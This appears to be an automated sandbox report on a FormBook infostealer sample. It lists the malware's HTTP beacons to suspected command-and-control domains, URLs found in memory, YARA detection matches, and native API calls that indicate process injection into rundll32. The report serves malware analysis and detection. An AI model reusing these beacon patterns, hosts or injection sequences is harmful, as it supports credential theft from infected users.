Source: Joe Sandbox View	ASN Name: DOSARRESTUS DOSARRESTUS
Source: Joe Sandbox View	ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View	ASN Name: VECTANTARTERIANetworksCorporationJP VECTANTARTERIANetworksCorporationJP

Source: global traffic	HTTP traffic detected: GET /a8si/?NZb=u+x8HrW8TaP2OTySFAVUaGkyVI6Qrz7itxoztY99JgBPvqcvqvs4xGCSIVWMYkPxCa9b&2dND=GVTl- HTTP/1.1Host: www.skynetaccess.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /a8si/?NZb=AKlWb4FzuMtnty9OGtxovY3lKx8NV8ATEUFEzcIxGa/JytTKcc+qEWA3ceqFQyW9WUsw&2dND=GVTl- HTTP/1.1Host: www.thepocket-onlinelesson.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /a8si/?NZb=pM4A9y9s2fQOT6MseLZ6D1nJp3ZoXi1DIz8HREKs7lWKo2rCfk3YBCWk1LbwXjkHseQ/&2dND=GVTl- HTTP/1.1Host: www.shirleyeluiz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /a8si/?NZb=ilDJZobCAoASZPKEjr+h2GJPzQZtXgxPn5qCqJ2imUF6WWwra1RdIaAgDcyp8aYyL3aO&2dND=GVTl- HTTP/1.1Host: www.drisu-goalkeeping.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /a8si/?NZb=+XN8NDZ1K2QCkRvOhUuLQIc57zcvFV8XafOJaWeGgjvpyrWV+MqtkcBEDSPdl300gZ3G&2dND=GVTl- HTTP/1.1Host: www.rogegalmish.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /a8si/?NZb=62/bSqqzpTDIfVncwf8kcLNbcalsRP0e0Vdwfvu8Ay8ZWoGvbHjczG9DeoieTYsPlzHS&2dND=GVTl- HTTP/1.1Host: www.best-cleaner.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /a8si/?NZb=O3o1U+q8oMW0A40QuM4kzZFzuvGZx18F2J1jOj0HsFueYiG3dIptHphoRZJy//fOFehA&2dND=GVTl- HTTP/1.1Host: www.4520oceanviewavenue.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /a8si/?NZb=jdN+3RUems8XgJANUws4WWtkbvXxMu2hTQ/t6K3f+t8prXi7JgWKk+q+WHlFohFhnqtz&2dND=GVTl- HTTP/1.1Host: www.omfgphil.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /a8si/?NZb=4F1bkU/AiPiMeDtr2vTtPD5XJl4c4IZLVeC3bIU2IShR3AvGXFCeCpQ25wAjwLp6N7J6&2dND=GVTl- HTTP/1.1Host: www.boostcoachingonline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.skynetaccess.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 12 May 2021 10:25:46 GMTServer: Apache/2.4.46 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: explorer.exe, 00000005.00000000.263565575.000000000F540000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmp	String found in binary or memory: http://servermanager.miixit.org/1
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmp	String found in binary or memory: http://servermanager.miixit.org/downloads/
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmp	String found in binary or memory: http://servermanager.miixit.org/hits/hit_index.php?k=
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmp	String found in binary or memory: http://servermanager.miixit.org/index_ru.html
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmp	String found in binary or memory: http://servermanager.miixit.org/index_ru.htmlc
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmp	String found in binary or memory: http://servermanager.miixit.org/report/reporter_index.php?name=
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: rundll32.exe, 00000009.00000002.486836362.0000000004FD2000.00000004.00000001.sdmp	String found in binary or memory: https://vm.tiktok.com/ZMJE3suep/a8si?NZb=jdN
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmp	String found in binary or memory: https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=CJU3DBQXBUQPC
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmp	String found in binary or memory: https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=CJU3DBQXBUQPC5http://servermana

Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.236001012.00000000009E8000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000009.00000002.481738454.00000000011E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.276852950.0000000001400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.238968916.00000000037E7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.480717659.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.276831846.00000000013D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.2.457b22da_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.457b22da_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000009.00000002.481738454.00000000011E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.481738454.00000000011E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.276852950.0000000001400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.276852950.0000000001400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.238968916.00000000037E7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.238968916.00000000037E7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.480717659.0000000000D10000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.480717659.0000000000D10000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.276831846.00000000013D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.276831846.00000000013D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.457b22da_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.457b22da_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.457b22da_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.457b22da_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

PE file contains section with special chars

Show sources

Source: 457b22da_by_Libranalysis.exe

Static PE information: section name: U#j;F_`

PE file has nameless sections

Show sources

Source: 457b22da_by_Libranalysis.exe

Static PE information: section name:

Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_004181C0 NtCreateFile,	4_2_004181C0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_00418270 NtReadFile,	4_2_00418270
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_004182F0 NtClose,	4_2_004182F0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_004183A0 NtAllocateVirtualMemory,	4_2_004183A0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0041826A NtReadFile,	4_2_0041826A
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0041839A NtAllocateVirtualMemory,	4_2_0041839A
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019599A0 NtCreateSection,LdrInitializeThunk,	4_2_019599A0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019595D0 NtClose,LdrInitializeThunk,	4_2_019595D0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01959910 NtAdjustPrivilegesToken,LdrInitializeThunk,	4_2_01959910
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01959540 NtReadFile,LdrInitializeThunk,	4_2_01959540
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019598F0 NtReadVirtualMemory,LdrInitializeThunk,	4_2_019598F0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01959840 NtDelayExecution,LdrInitializeThunk,	4_2_01959840
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01959860 NtQuerySystemInformation,LdrInitializeThunk,	4_2_01959860
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01959780 NtMapViewOfSection,LdrInitializeThunk,	4_2_01959780
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019597A0 NtUnmapViewOfSection,LdrInitializeThunk,	4_2_019597A0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01959FE0 NtCreateMutant,LdrInitializeThunk,	4_2_01959FE0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01959710 NtQueryInformationToken,LdrInitializeThunk,	4_2_01959710
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019596E0 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_019596E0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01959A00 NtProtectVirtualMemory,LdrInitializeThunk,	4_2_01959A00
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01959A20 NtResumeThread,LdrInitializeThunk,	4_2_01959A20
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01959A50 NtCreateFile,LdrInitializeThunk,	4_2_01959A50
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01959660 NtAllocateVirtualMemory,LdrInitializeThunk,	4_2_01959660
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019599D0 NtCreateProcessEx,	4_2_019599D0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019595F0 NtQueryInformationFile,	4_2_019595F0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0195AD30 NtSetContextThread,	4_2_0195AD30
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01959520 NtWaitForSingleObject,	4_2_01959520
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01959950 NtQueueApcThread,	4_2_01959950
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01959560 NtWriteFile,	4_2_01959560
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019598A0 NtWriteVirtualMemory,	4_2_019598A0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01959820 NtEnumerateKey,	4_2_01959820
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0195B040 NtSuspendThread,	4_2_0195B040
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0195A3B0 NtGetContextThread,	4_2_0195A3B0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0195A710 NtOpenProcessToken,	4_2_0195A710
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01959B00 NtSetValueKey,	4_2_01959B00
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01959730 NtQueryVirtualMemory,	4_2_01959730
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01959770 NtSetInformationFile,	4_2_01959770
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0195A770 NtOpenThread,	4_2_0195A770
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01959760 NtOpenProcess,	4_2_01959760
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01959A80 NtOpenDirectoryObject,	4_2_01959A80
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019596D0 NtCreateKey,	4_2_019596D0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01959610 NtEnumerateValueKey,	4_2_01959610
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01959A10 NtQuerySection,	4_2_01959A10
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01959650 NtQueryValueKey,	4_2_01959650
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01959670 NtQueryInformationProcess,	4_2_01959670
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04989840 NtDelayExecution,LdrInitializeThunk,	9_2_04989840
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04989860 NtQuerySystemInformation,LdrInitializeThunk,	9_2_04989860
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049899A0 NtCreateSection,LdrInitializeThunk,	9_2_049899A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049895D0 NtClose,LdrInitializeThunk,	9_2_049895D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04989910 NtAdjustPrivilegesToken,LdrInitializeThunk,	9_2_04989910
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04989540 NtReadFile,LdrInitializeThunk,	9_2_04989540
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049896D0 NtCreateKey,LdrInitializeThunk,	9_2_049896D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049896E0 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_049896E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04989650 NtQueryValueKey,LdrInitializeThunk,	9_2_04989650
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04989A50 NtCreateFile,LdrInitializeThunk,	9_2_04989A50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04989660 NtAllocateVirtualMemory,LdrInitializeThunk,	9_2_04989660
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04989780 NtMapViewOfSection,LdrInitializeThunk,	9_2_04989780
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04989FE0 NtCreateMutant,LdrInitializeThunk,	9_2_04989FE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04989710 NtQueryInformationToken,LdrInitializeThunk,	9_2_04989710
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049898A0 NtWriteVirtualMemory,	9_2_049898A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049898F0 NtReadVirtualMemory,	9_2_049898F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04989820 NtEnumerateKey,	9_2_04989820
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0498B040 NtSuspendThread,	9_2_0498B040
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049899D0 NtCreateProcessEx,	9_2_049899D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049895F0 NtQueryInformationFile,	9_2_049895F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0498AD30 NtSetContextThread,	9_2_0498AD30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04989520 NtWaitForSingleObject,	9_2_04989520
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04989950 NtQueueApcThread,	9_2_04989950
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04989560 NtWriteFile,	9_2_04989560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04989A80 NtOpenDirectoryObject,	9_2_04989A80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04989610 NtEnumerateValueKey,	9_2_04989610
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04989A10 NtQuerySection,	9_2_04989A10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04989A00 NtProtectVirtualMemory,	9_2_04989A00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04989A20 NtResumeThread,	9_2_04989A20
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04989670 NtQueryInformationProcess,	9_2_04989670
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0498A3B0 NtGetContextThread,	9_2_0498A3B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049897A0 NtUnmapViewOfSection,	9_2_049897A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0498A710 NtOpenProcessToken,	9_2_0498A710
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04989B00 NtSetValueKey,	9_2_04989B00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04989730 NtQueryVirtualMemory,	9_2_04989730
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04989770 NtSetInformationFile,	9_2_04989770
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0498A770 NtOpenThread,	9_2_0498A770
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04989760 NtOpenProcess,	9_2_04989760
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_009081C0 NtCreateFile,	9_2_009081C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_009082F0 NtClose,	9_2_009082F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00908270 NtReadFile,	9_2_00908270
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_009083A0 NtAllocateVirtualMemory,	9_2_009083A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0090826A NtReadFile,	9_2_0090826A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0090839A NtAllocateVirtualMemory,	9_2_0090839A

Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_00C92CC9	0_2_00C92CC9
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_00C904E1	0_2_00C904E1
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_00C91881	0_2_00C91881
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_00C92450	0_2_00C92450
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_00C96C79	0_2_00C96C79
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_00C94590	0_2_00C94590
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_00C9B1A8	0_2_00C9B1A8
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_00C936B0	0_2_00C936B0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_00C944A0	0_2_00C944A0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_00C94466	0_2_00C94466
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_00C95411	0_2_00C95411
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_00C95420	0_2_00C95420
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_00C96820	0_2_00C96820
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_00C96830	0_2_00C96830
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_00C9A1B0	0_2_00C9A1B0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_00C976DA	0_2_00C976DA
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_00C96A99	0_2_00C96A99
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_00C96AA8	0_2_00C96AA8
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_00C96600	0_2_00C96600
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_00C96610	0_2_00C96610
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_00C95210	0_2_00C95210
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_00C95F91	0_2_00C95F91
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_00C95FA0	0_2_00C95FA0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_00C923B4	0_2_00C923B4
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_04BF1FD0	0_2_04BF1FD0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 0_2_04BF56C8	0_2_04BF56C8
